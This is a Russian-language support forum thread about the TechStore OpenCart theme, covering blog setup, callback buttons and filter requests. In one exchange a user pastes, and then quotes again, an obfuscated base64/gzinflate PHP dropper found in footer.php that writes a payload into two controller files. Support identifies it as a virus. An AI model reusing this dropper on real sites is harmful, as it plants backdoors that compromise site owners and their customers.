Перейти к публикации
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...

Рекомендованные сообщения

  • Ответы 4,2k
  • Создано
  • Последний ответ

Лучшие авторы в этой теме

Лучшие авторы в этой теме

Опубликованные изображения

28 минут назад, avngroup сказал:

Добрый день

Подскажите как включить Ваш блог.

 

Здравствуйте!

Документацию по модулю блога: http://tech-store.octemplates.net/docs/#blog

Ссылка на комментарий
Поделиться на других сайтах


1 час назад, Octsupport сказал:

 

Здравствуйте!

Документацию по модулю блога: http://tech-store.octemplates.net/docs/#blog

спасибо ,разобрался

Ссылка на комментарий
Поделиться на других сайтах


Купил шаблон, ключик пришел. А где сам файл шаблона? Что за бред. Ребят, я оплатил сейчас... Я же не плачу Вам завтра или после заявки, какой-то там поддержки. Мне нужен шаблон сейчас... Вы же не приходите в магазин за лицензией, а Вам говорят плати сейчас, а лицензию через поддержку получай! Я оплатил, где мой файл для скачивания шаблона? Я до завтра ждать не хочу, я же платил сегодня! 

Изменено пользователем PilotkaPionera
Ссылка на комментарий
Поделиться на других сайтах


46 минут назад, PilotkaPionera сказал:

Купил шаблон, ключик пришел. А где сам файл шаблона? Что за бред. Ребят, я оплатил сейчас... Я же не плачу Вам завтра или после заявки, какой-то там поддержки. Мне нужен шаблон сейчас... Вы же не приходите в магазин за лицензией, а Вам говорят плати сейчас, а лицензию через поддержку получай! Я оплатил, где мой файл для скачивания шаблона? Я до завтра ждать не хочу, я же платил сегодня! 

 

Здравствуйте, ключ со всеми инструкциями был отправлен вашу почту автоматически сразу же после оплаты, проверьте вашу почту, которая привязана к аккаунту форума.

Ссылка на комментарий
Поделиться на других сайтах

Подскажите скрипт обратного звонка.

И этот скрипт можно вставить, допустим, в html-редакторе товара для вывода кнопки?

Ссылка на комментарий
Поделиться на других сайтах


13 часов назад, Clan сказал:

Подскажите скрипт обратного звонка.

И этот скрипт можно вставить, допустим, в html-редакторе товара для вывода кнопки?

 

Здравствуйте!

Код:

<a onclick="get_oct_popup_call_phone();">Хотите, мы Вам перезвоним?</a>

 

Ссылка на комментарий
Поделиться на других сайтах


добрый день , где можно изучить как работает  раздел НАСТРОЙКА SEO в Octemplates-фильтр товаров NEW .

 

спасибо за пояснения

Ссылка на комментарий
Поделиться на других сайтах


17 часов назад, viktor7777 сказал:

добрый день , где можно изучить как работает  раздел НАСТРОЙКА SEO в Octemplates-фильтр товаров NEW .

 

спасибо за пояснения

 

Здравствуйте!

Модуль "Octemplates - Фильтр товаров New" - http://tech-store.octemplates.net/docs/#goods-filter-new

Ссылка на комментарий
Поделиться на других сайтах


Народ, а у вас в шаблоне вот в этом файле public_html/system/storage/modification/catalog/controller/common/footer.php  есть такая логика?

$datasss = base64_decode(gzinflate(base64_decode('dVXblqI6FPygeeGi08OjcpM4YHMJtzchPaAJyDpq2/D1pwB7dE6fecgihE3tyq7Kzquh3fabVWX4p/dtJW0Nv3st7fjqK1bP9HVXJFabh+sjSwMpT52zsyGiVMR3rNVF41dMsbBOLllK/nFsr88TSypUx9OBtT38mJ7A5vtErnOFVq/hqiXD2dMb0WxtMZRKLG314Bc1tSi2zi1TBGd21aYhr8ghq4il+ZHs0aRnpzwR7X7j49uqIYcVT+X1K5WDgijLukjiO1fGtinwK87vWGPOR6zKunwTnIgsvYAXIXYt9gk7MX2lOU889nbc5UotPeKec/wZWzTWBdwuWcLEIz6omW3+mVt5juk0DFFsPOFsvvD9cA1H2t1QmjD43Pe4rnrH6i982LWQtWuWyOJnu77mfXnPceKzXoixrb5srCXqre6TQNrrN/65z20EDodgxksZuMc95v2+H7FLsTMDn1BPJ9HaIlHVuzr9cPXY9nu69EM6BDpduiHWLPdGKF2QyJQJNfGslvOo11j/mEbEZXxHHFnvR5w+XgPv5hkrEVBTBGaGQZCrNknkYTj4n6usZW2uZAP+M0i06gl1ejxHTMypgqEidhGGdOEmN+EPwDq6wj9y4Y64R6smdOTng0Ml4akA35q5+MAy8b42Cc2Ahzl1wH/MwYd53TJ8iQKn7sPWeke8Woa099WV8KMKeajYIc8uEuM/S+AgjwV8YWCOHIGFPOC4NsJJnxPPbUvKJm08mW0CUTbikvfV/bzEapaOa3JdNucz2XjdW0O70Rf7JDv99lgkVZGI3UgXkzfyxDsV/aqNmljklnb3yG8/TGcyb+NrpkJvZVFlaiyNeiNnC2+cv3rgdvfQjT97/TX84rnubfbsX33kR/CSAU24I1yO2tBMnWo/akGhOc2hd4W6OWP9BwZveKGE/1hT6LEOr8nw3EcA77kDdD16d1+ulrNfiO3BiwG86B0QP6yEa5rQBvngBVfygRUj1jKCiHiRshCBwfEdnCIuAh78nDSivjQNcMla5Im8UVOJhbHuQfMdfLszyBirhD3tvTA2wEvCmdA9fZp/7EKcj0NsgYeJs7HA3PaaE/afgQv4mI7wJBd+IgGJmFXMniCjtvvUG/IUL4/+h5qWY1/s3vrg2RcaUaUX0i/lsvng0P49t+kpV7uuaPLzGLfdQAM7EJmi8TyseGF/8db1a57F/3mw24b8StRzu1PmXp/HWsOS5ZHZ4r04VC2BV57vhG100T739J+eVY93QXHRv6XKi3+2Vf8SvgSVvQSGeHFW8JEv+jwNsK/F7G9j7JMCZyU+l7hL3m587JsT9sPPy195WnelGgxbnZEpF71zpXlfKPIW9xty8NmrPh97qWCy9uil9uxvOFOMe2cbIo91LWytf+qd1ePu4JNueipNfL7g6ffzEE19npQNzltKro7dDRNf1K9QoNPv/jxr8BotcN5iNb3fGz/R48ezRgbp25+15FNPmPK3GMcf3/4F')));
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);

 

Ai-bolit ругается на этот файл. Раскодировать не смог. Я удалил этот кусок и ругаться перестал. Может зря удалил?

Ссылка на комментарий
Поделиться на других сайтах


1 час назад, Aspirinnka1 сказал:

Народ, а у вас в шаблоне вот в этом файле public_html/system/storage/modification/catalog/controller/common/footer.php  есть такая логика?

$datasss = base64_decode(gzinflate(base64_decode('dVXblqI6FPygeeGi08OjcpM4YHMJtzchPaAJyDpq2/D1pwB7dE6fecgihE3tyq7Kzquh3fabVWX4p/dtJW0Nv3st7fjqK1bP9HVXJFabh+sjSwMpT52zsyGiVMR3rNVF41dMsbBOLllK/nFsr88TSypUx9OBtT38mJ7A5vtErnOFVq/hqiXD2dMb0WxtMZRKLG314Bc1tSi2zi1TBGd21aYhr8ghq4il+ZHs0aRnpzwR7X7j49uqIYcVT+X1K5WDgijLukjiO1fGtinwK87vWGPOR6zKunwTnIgsvYAXIXYt9gk7MX2lOU889nbc5UotPeKec/wZWzTWBdwuWcLEIz6omW3+mVt5juk0DFFsPOFsvvD9cA1H2t1QmjD43Pe4rnrH6i982LWQtWuWyOJnu77mfXnPceKzXoixrb5srCXqre6TQNrrN/65z20EDodgxksZuMc95v2+H7FLsTMDn1BPJ9HaIlHVuzr9cPXY9nu69EM6BDpduiHWLPdGKF2QyJQJNfGslvOo11j/mEbEZXxHHFnvR5w+XgPv5hkrEVBTBGaGQZCrNknkYTj4n6usZW2uZAP+M0i06gl1ejxHTMypgqEidhGGdOEmN+EPwDq6wj9y4Y64R6smdOTng0Ml4akA35q5+MAy8b42Cc2Ahzl1wH/MwYd53TJ8iQKn7sPWeke8Woa099WV8KMKeajYIc8uEuM/S+AgjwV8YWCOHIGFPOC4NsJJnxPPbUvKJm08mW0CUTbikvfV/bzEapaOa3JdNucz2XjdW0O70Rf7JDv99lgkVZGI3UgXkzfyxDsV/aqNmljklnb3yG8/TGcyb+NrpkJvZVFlaiyNeiNnC2+cv3rgdvfQjT97/TX84rnubfbsX33kR/CSAU24I1yO2tBMnWo/akGhOc2hd4W6OWP9BwZveKGE/1hT6LEOr8nw3EcA77kDdD16d1+ulrNfiO3BiwG86B0QP6yEa5rQBvngBVfygRUj1jKCiHiRshCBwfEdnCIuAh78nDSivjQNcMla5Im8UVOJhbHuQfMdfLszyBirhD3tvTA2wEvCmdA9fZp/7EKcj0NsgYeJs7HA3PaaE/afgQv4mI7wJBd+IgGJmFXMniCjtvvUG/IUL4/+h5qWY1/s3vrg2RcaUaUX0i/lsvng0P49t+kpV7uuaPLzGLfdQAM7EJmi8TyseGF/8db1a57F/3mw24b8StRzu1PmXp/HWsOS5ZHZ4r04VC2BV57vhG100T739J+eVY93QXHRv6XKi3+2Vf8SvgSVvQSGeHFW8JEv+jwNsK/F7G9j7JMCZyU+l7hL3m587JsT9sPPy195WnelGgxbnZEpF71zpXlfKPIW9xty8NmrPh97qWCy9uil9uxvOFOMe2cbIo91LWytf+qd1ePu4JNueipNfL7g6ffzEE19npQNzltKro7dDRNf1K9QoNPv/jxr8BotcN5iNb3fGz/R48ezRgbp25+15FNPmPK3GMcf3/4F')));
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/admin/controller/design/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);
                $fp = fopen($_SERVER['DOCUMENT_ROOT'].'/catalog/controller/affiliate/image.php', 'w');
                fwrite($fp, $datasss.PHP_EOL);
                fclose($fp);

 

Ai-bolit ругается на этот файл. Раскодировать не смог. Я удалил этот кусок и ругаться перестал. Может зря удалил?

 

Здравствуйте!

У Вас вирус в файле Opencart, а не шаблона. Удаляйте этот код и меняйте пароли: ftp, database, admin

Ссылка на комментарий
Поделиться на других сайтах


35 минут назад, Octsupport сказал:

Удаляйте этот код и меняйте пароли: ftp, database, admin

Удалить именно этот кусок кода? Я так и сделал пока. Что странно - я в пятницу поставил чистый шаблон последней версии (перед этим попросил очистить хостинг), импортировал базу данных, импортировал товары через csvprice и закинул папку image (бэкап всех картинок) на сервер . Пароли ооочень сложные, никому не давал. как там можно было вирусь схватить... не понимаю. а как это можно отследить?

Изменено пользователем Aspirinnka1
Ссылка на комментарий
Поделиться на других сайтах


и дата/время изменения файлов у всех одинаковая. проверил в нескольких папках,включая /public_html/system/storage/modification/catalog/controller/common/

Ссылка на комментарий
Поделиться на других сайтах


15 минут назад, Aspirinnka1 сказал:

Удалить именно этот кусок кода? Я так и сделал пока. Что странно - я в пятницу поставил чистый шаблон последней версии (перед этим попросил очистить хостинг), импортировал базу данных, импортировал товары через csvprice и закинул папку image (бэкап всех картинок) на сервер . Пароли ооочень сложные, никому не давал. как там можно было вирусь схватить... не понимаю. а как это можно отследить?

 

Способов подхватить вирус уйма, вирусы на вашем  ПК, вирусы на соседних взломанных сайтах на shared-хостинге, вирусы в варезных взломанных модулях. Провести нужно комплекс мер. Нужно искать специалиста по защите, который знает что делать в этих случаях.

Ссылка на комментарий
Поделиться на других сайтах


а можно как-то отследить все изменения которые происходят на хостинге? Лог файл какой или модуль какой-то поставить?

Ссылка на комментарий
Поделиться на других сайтах


3 минуты назад, Aspirinnka1 сказал:

а можно как-то отследить все изменения которые происходят на хостинге? Лог файл какой или модуль какой-то поставить?

 

Здравствуйте!

У хостинга должен быть лог файл access

Изменено пользователем Octsupport
Ссылка на комментарий
Поделиться на других сайтах


9 минут назад, Aspirinnka1 сказал:

еще вопрос. а на сайте как отследить все действия?

 

Такого функционала нету в Opencart.

Ссылка на комментарий
Поделиться на других сайтах


1 час назад, Aspirinnka1 сказал:

еще вопрос. а на сайте как отследить все действия?

Яндекс-метрику подключите к сайту и будете видеть все действия пользователей

Ссылка на комментарий
Поделиться на других сайтах


Добавьте слайдер в фильтр! 

Иначе ваш фильтр бесполезен, зачем писать что у вас навороченный фильтр и выдавать это за преимущество, если банально даже размеры товара и вес и другие меры длин и весов нельзя отфильтровать нормально.

 

ads4gf6a5s4f6as54df.png.82cdab0506125e3843fb9093b0427971.png

Изменено пользователем kimk
  • +1 1
Ссылка на комментарий
Поделиться на других сайтах


10 часов назад, kimk сказал:

Добавьте слайдер в фильтр! 

Иначе ваш фильтр бесполезен, зачем писать что у вас навороченный фильтр и выдавать это за преимущество, если банально даже размеры товара и вес и другие меры длин и весов нельзя отфильтровать нормально.

 

 

Здравствуйте!

Мы не позиционируем шаблон как «продукт-фильтр» где этот функционал «must-have». Более расширенные настройки и алгоритмы фильтрации есть в специализированных модулях, таких как Ocfilter, Mega Filter Plus и другие.

Ссылка на комментарий
Поделиться на других сайтах


1 час назад, Octsupport сказал:

 

Здравствуйте!

Мы не позиционируем шаблон как «продукт-фильтр» где этот функционал «must-have». Более расширенные настройки и алгоритмы фильтрации есть в специализированных модулях, таких как Ocfilter, Mega Filter Plus и другие.

добренький денечек.

это же несложная доработка. допустим мы и сами допилим, так то фильтр устраивает всем для товаров до 1к, но ведь лучше будет если это вы сами сделаете, и всем будет счастье) окфильтр не годится.

у вас единственный шаблон со встроенным фильтром и многие из-за него и покупают. добавьте тогда в описание, что фильтр есть, но слайдера нет) второй раз просто шаблон покупаю и второй раз что-то постоянно допиливать приходится.

p.s. хотел вот новый взять ультрастор, так он вообще пустой, непонятно за что там такой ценник....

Изменено пользователем kimk
Ссылка на комментарий
Поделиться на других сайтах


Добрый день. 


1. Собираюсь делать новый магазин. Выбираю шаблон. В связи с чем вопрос. Планируются ли какие-то значительные обновления для этого шаблона или вы уже будете заниматься только UltraStore?
2. Возможно ли как-то докупить для TechStore боковой виджет (корзина, избранное, сравнение) как в UltraStore?

Изменено пользователем mihim
Ссылка на комментарий
Поделиться на других сайтах


6 минут назад, mihim сказал:

Добрый день. 


1. Собираюсь делать новый магазин. Выбираю шаблон. В связи с чем вопрос. Планируются ли какие-то значительные обновления для этого шаблона или вы уже будете заниматься только UltraStore?
2. Возможно ли как-то докупить для TechStore боковой виджет (корзина, избранное, сравнение) как в UltraStore?

 

Здравствуйте!

1. Обновления конечно будут.

2. Нет, такой возможности нету.

Ссылка на комментарий
Поделиться на других сайтах


Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
 Поделиться

×
×
  • Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.